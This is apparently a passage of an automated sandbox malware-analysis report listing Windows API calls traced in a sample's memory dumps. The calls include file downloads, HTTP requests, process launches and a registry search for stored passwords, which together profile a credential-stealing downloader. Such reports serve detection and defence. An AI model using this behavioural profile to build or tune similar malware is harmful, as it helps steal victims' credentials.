                                                  • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                  • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                  • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                                • StrCmpCA.SHLWAPI(?,008CAEB0), ref: 00406147
                                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                                • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                                • InternetCloseHandle.WININET(a+A), ref: 00406253
                                                • InternetCloseHandle.WININET(00000000), ref: 00406260
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                • String ID: a+A$a+A
                                                • API String ID: 4287319946-2847607090
                                                • Opcode ID: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                                • Opcode Fuzzy Hash: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                                APIs
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                • memset.MSVCRT ref: 00820E83
                                                • lstrcat.KERNEL32(?,00000000), ref: 00820E9C
                                                • lstrcat.KERNEL32(?,00420D7C), ref: 00820EAE
                                                • lstrcat.KERNEL32(?,00000000), ref: 00820EC4
                                                • lstrcat.KERNEL32(?,00420D80), ref: 00820ED6
                                                • lstrcat.KERNEL32(?,00000000), ref: 00820EEF
                                                • lstrcat.KERNEL32(?,00420D84), ref: 00820F01
                                                • lstrlen.KERNEL32(?), ref: 00820F0E
                                                • memset.MSVCRT ref: 00820F34
                                                • memset.MSVCRT ref: 00820F48
                                                  • Part of subcall function 0082AA87: lstrlen.KERNEL32(0081516C,?,?,0081516C,00420DDE), ref: 0082AA92
                                                  • Part of subcall function 0082AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0082AAEC
                                                  • Part of subcall function 00828DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00811660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 00828DED
                                                  • Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
                                                  • Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9
                                                  • Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
                                                  • Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
                                                  • Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79
                                                  • Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C
                                                  • Part of subcall function 0082AA07: lstrcpy.KERNEL32(?,00000000), ref: 0082AA4D
                                                  • Part of subcall function 00829927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00820DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 00829948
                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00820FC1
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00820FCD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                • String ID:
                                                • API String ID: 1395395982-0
                                                • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                • Instruction ID: e844861eeb0fd2a17f3d9dd63a5d8428cfbbbb8af720ed3c866e0143ad32d7ad
                                                • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                • Instruction Fuzzy Hash: A48164B5500134ABCB18EBA4ED56FED7779FF44704F404199B206A6082EE746BC8CF5A
                                                APIs
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                • memset.MSVCRT ref: 00820E83
                                                • lstrcat.KERNEL32(?,00000000), ref: 00820E9C
                                                • lstrcat.KERNEL32(?,00420D7C), ref: 00820EAE
                                                • lstrcat.KERNEL32(?,00000000), ref: 00820EC4
                                                • lstrcat.KERNEL32(?,00420D80), ref: 00820ED6
                                                • lstrcat.KERNEL32(?,00000000), ref: 00820EEF
                                                • lstrcat.KERNEL32(?,00420D84), ref: 00820F01
                                                • lstrlen.KERNEL32(?), ref: 00820F0E
                                                • memset.MSVCRT ref: 00820F34
                                                • memset.MSVCRT ref: 00820F48
                                                  • Part of subcall function 0082AA87: lstrlen.KERNEL32(0081516C,?,?,0081516C,00420DDE), ref: 0082AA92
                                                  • Part of subcall function 0082AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0082AAEC
                                                  • Part of subcall function 00828DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00811660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 00828DED
                                                  • Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
                                                  • Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9
                                                  • Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
                                                  • Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
                                                  • Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79
                                                  • Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C
                                                  • Part of subcall function 0082AA07: lstrcpy.KERNEL32(?,00000000), ref: 0082AA4D
                                                  • Part of subcall function 00829927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00820DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 00829948
                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00820FC1
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00820FCD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                • String ID:
                                                • API String ID: 1395395982-0
                                                • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                • Instruction ID: 656666086e653bd36fe892bb46ad35c63ca3a9bce428b080829c7fa64719a3f5
                                                • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                • Instruction Fuzzy Hash: D56163B5500128ABCB18EBA4ED56FED7738FF44704F404599B706A6082EA746BC8CF5A
                                                APIs
                                                  • Part of subcall function 0082AA07: lstrcpy.KERNEL32(?,00000000), ref: 0082AA4D
                                                  • Part of subcall function 00814A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A51
                                                  • Part of subcall function 00814A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A68
                                                  • Part of subcall function 00814A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A7F
                                                  • Part of subcall function 00814A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00814AA0
                                                  • Part of subcall function 00814A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00814AB0
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00814B7C
                                                • StrCmpCA.SHLWAPI(?,0064A480), ref: 00814BA1
                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00814D21
                                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 0081504F
                                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0081506B
                                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 0081507F
                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008150B0
                                                • InternetCloseHandle.WININET(00000000), ref: 00815114
                                                • InternetCloseHandle.WININET(00000000), ref: 0081512C
                                                • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00814D7C
                                                  • Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
                                                  • Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
                                                  • Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79
                                                  • Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C
                                                  • Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
                                                  • Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9
                                                • InternetCloseHandle.WININET(00000000), ref: 00815136
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                • String ID:
                                                • API String ID: 2402878923-0
                                                • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                • Instruction ID: f19ed5f28735eb7a3bf113a36baf7173be61c7b6b3ef2dd4ee17fcc6433733da
                                                • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                • Instruction Fuzzy Hash: 9B129871910228EBCB19EB94ED92EEEB779FF15700F504199B106A2491DF742BC8CF52
                                                APIs
                                                  • Part of subcall function 0082AA07: lstrcpy.KERNEL32(?,00000000), ref: 0082AA4D
                                                  • Part of subcall function 00814A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A51
                                                  • Part of subcall function 00814A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A68
                                                  • Part of subcall function 00814A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A7F
                                                  • Part of subcall function 00814A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00814AA0
                                                  • Part of subcall function 00814A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00814AB0
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 00816548
                                                • StrCmpCA.SHLWAPI(?,0064A480), ref: 0081656A
                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0081659C
                                                • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 008165EC
                                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00816626
                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00816638
                                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00816664
                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008166D4
                                                • InternetCloseHandle.WININET(00000000), ref: 00816756
                                                • InternetCloseHandle.WININET(00000000), ref: 00816760
                                                • InternetCloseHandle.WININET(00000000), ref: 0081676A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                • String ID:
                                                • API String ID: 3074848878-0
                                                • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                • Instruction ID: 50e690d44d28418b47014cf64bf48fb7a91e36a93008644e1411e9e8cfeecf7c
                                                • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                • Instruction Fuzzy Hash: 10712B75A40228EBDB24DFA4DC59BEE7779FF44700F104199F10AAA190DBB56AC4CF42
                                                APIs
                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 008292D3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateGlobalStream
                                                • String ID:
                                                • API String ID: 2244384528-0
                                                • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                • Instruction ID: f1ad9ff5fcc23579b0ce2e6437573c35db5bcbe216d38e393a5987aeba1e3e29
                                                • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                • Instruction Fuzzy Hash: 5971E8B9A40218ABDB14EBE4DC89FEEB7B9FF49300F108508F515E7294DB34A945CB61
                                                APIs
                                                • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                                • memset.MSVCRT ref: 0041716A
                                                • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                                Strings
                                                • sA, xrefs: 00417111
                                                • sA, xrefs: 004172AE, 00417179, 0041717C
                                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: OpenProcesslstrcpymemset
                                                • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                • API String ID: 224852652-2614523144
                                                • Opcode ID: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                                • Opcode Fuzzy Hash: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                                APIs
                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 008277A9
                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008277E6
                                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0082786A
                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00827871
                                                • wsprintfA.USER32 ref: 008278A7
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                • String ID: :$C$\$B
                                                • API String ID: 1544550907-183544611
                                                • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                • Instruction ID: ea0aae454027fa8d6ab1a8cf1b227c515dfb97a6df2768e81ff54e4ab75098bc
                                                • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                • Instruction Fuzzy Hash: 08417DB1D04268EBDB10DF94DC45BEEBBB9FF48704F100199F505A7280DB756A84CBA6
                                                APIs
                                                  • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                                  • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                  • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                  • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                  • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                  • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                                • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                                • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                                • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                                • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                                • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                                • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                                • task.LIBCPMTD ref: 004076FB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                • String ID: :
                                                • API String ID: 3191641157-3653984579
                                                • Opcode ID: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                                • Opcode Fuzzy Hash: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                                APIs
                                                • lstrcpy.KERNEL32(?,?), ref: 00821642
                                                  • Part of subcall function 00829047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00829072
                                                  • Part of subcall function 008294C7: StrStrA.SHLWAPI(?,?), ref: 008294D3
                                                • lstrcpy.KERNEL32(?,00000000), ref: 0082167E
                                                  • Part of subcall function 008294C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 008294F7
                                                  • Part of subcall function 008294C7: lstrlen.KERNEL32(?), ref: 0082950E
                                                  • Part of subcall function 008294C7: wsprintfA.USER32 ref: 0082952E
                                                • lstrcpy.KERNEL32(?,00000000), ref: 008216C6
                                                • lstrcpy.KERNEL32(?,00000000), ref: 0082170E
                                                • lstrcpy.KERNEL32(?,00000000), ref: 00821755
                                                • lstrcpy.KERNEL32(?,00000000), ref: 0082179D
                                                • lstrcpy.KERNEL32(?,00000000), ref: 008217E5
                                                • lstrcpy.KERNEL32(?,00000000), ref: 0082182C
                                                • lstrcpy.KERNEL32(?,00000000), ref: 00821874
                                                  • Part of subcall function 0082AA87: lstrlen.KERNEL32(0081516C,?,?,0081516C,00420DDE), ref: 0082AA92
                                                  • Part of subcall function 0082AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0082AAEC
                                                • strtok_s.MSVCRT ref: 008219B7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                                • String ID:
                                                • API String ID: 4276352425-0
                                                • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                • Instruction ID: 8cf4969d5b8d08c2f20ca9bdc189b48b2e8498ca1db580035b46cc7b00906d63
                                                • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                • Instruction Fuzzy Hash: 957143B695012CABCB14EBA4EC89EEE7379FF64300F044598F149E2141EA75ABC4CF52
                                                APIs
                                                • memset.MSVCRT ref: 00407314
                                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                  • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                                • task.LIBCPMTD ref: 00407555
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                • String ID: Password
                                                • API String ID: 2698061284-3434357891
                                                • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                                • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                                APIs
                                                • lstrcatA.KERNEL32(?,008C94C0,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                                  • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                                • lstrcatA.KERNEL32(?,?), ref: 00414820
                                                • lstrcatA.KERNEL32(?,?), ref: 00414834
                                                • lstrcatA.KERNEL32(?,00894AE0), ref: 00414847
                                                • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                                • lstrcatA.KERNEL32(?,008C9B60), ref: 0041486F
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                  • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                                  • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                                  • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                                  • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                • String ID: 0aA
                                                • API String ID: 167551676-2786531170
                                                • Opcode ID: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                                • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                                • Opcode Fuzzy Hash: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                                • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                                APIs
